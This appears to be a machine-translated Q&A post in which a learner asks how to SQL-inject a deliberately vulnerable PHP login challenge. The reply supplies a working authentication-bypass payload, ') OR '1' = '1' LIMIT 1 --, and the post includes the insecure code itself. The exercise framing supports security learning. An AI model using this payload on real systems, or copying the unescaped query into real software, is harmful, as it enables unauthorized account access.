为了学习目的(这只是一个练习)我必须尝试SQL注入一个简单的PHP代码。这是代码:
$query = sprintf("SELECT * FROM my_table WHERE login = '%s' AND password = MD5('%s')", mysql_real_escape_string($_POST['login']), $_POST['password'] );
$sql = mysql_query($query);
if (@mysql_num_rows($sql) == 1)
$auth = TRUE;
访问权限由“$ auth = TRUE”授予。我已经明白,弱点在密码字段中,因为字符不会被转义。但是我没理解。我已经尝试了许多字符串使用我认为我 - 知道并优先于OR,如:
‘) OR id = 1 AND MD5(‘a’) = MD5(‘a
我想有一些我忽略的SQL请求语法。如果有人能指出它会很棒!
提前致谢 :)
/////编辑/////
我试过了
‘) OR ‘1’ = ‘1’ LIMIT 1 —
但没有成功......
以下是“页面”的完整代码:
<?php
# Easy starter :)
/* Init database
-- Table structure for table `haxorz_memberz`
--
CREATE TABLE IF NOT EXISTS `haxorz_memberz` (
`login` varchar(15) collate utf8_unicode_ci NOT NULL,
`password` varchar(65) collate utf8_unicode_ci NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
*/
define('BDD_HOST', 'localhost');
define('BDD_USER', 'FIXME');
define('BDD_PASSWORD', 'FIXME');
define('BDD_DATABASE', 'FIXME');
define('CHALLENGE_PASSWORD', 'FIXME');
require_once dirname(__FILE__).'/inc/lang.php';
require_once dirname(__FILE__).'/inc/header.php';
$auth = FALSE;
if (isset($_POST['login'], $_POST['password']) && is_string($_POST['login']) && is_string($_POST['password']))
{
$con = mysql_connect(BDD_HOST, BDD_USER, BDD_PASSWORD);
mysql_select_db(BDD_DATABASE, $con);
$query = sprintf("SELECT * FROM haxorz_memberz WHERE login = '%s' AND password = MD5('%s')",
mysql_real_escape_string($_POST['login']),
$_POST['password']
);
$sql = mysql_query($query);
if (@mysql_num_rows($sql) == 1)
$auth = TRUE;
else
printf(fail);
}
if ($auth)
{
printf(greetz, CHALLENGE_PASSWORD);
}
else
{
echo <<< EOT
<form method="post" action="">
<table style="margin-left : auto; margin-right : auto;">
<tr><td><strong>Login</strong></td><td><input type="text" size="15" name="login" /></td></tr>
<tr><td><strong>Password<strong></td><td><input type="password" size="15" name="password" /></td></tr>
<tr><td colspan="2" style="text-align: center;"><input type="submit" /></td></tr>
</table>
</form>
EOT;
}
require_once dirname(__FILE__).'/inc/footer.php';
?>
你使用') OR '1' = '1' LIMIT 1 --
的方法应该有效。但请确保
一个。在--
之后有一个空格,否则它不被视为评论。
湾您输入有效的登录名。
最后的查询应该是这样的
SELECT
*
FROM
haxorz_memberz
WHERE
login = 'your_login' AND
password = MD5('') OR
'1' = '1'
LIMIT 1 -- ')
这是一个有效的查询,应该只提供一个登录your_login
的条目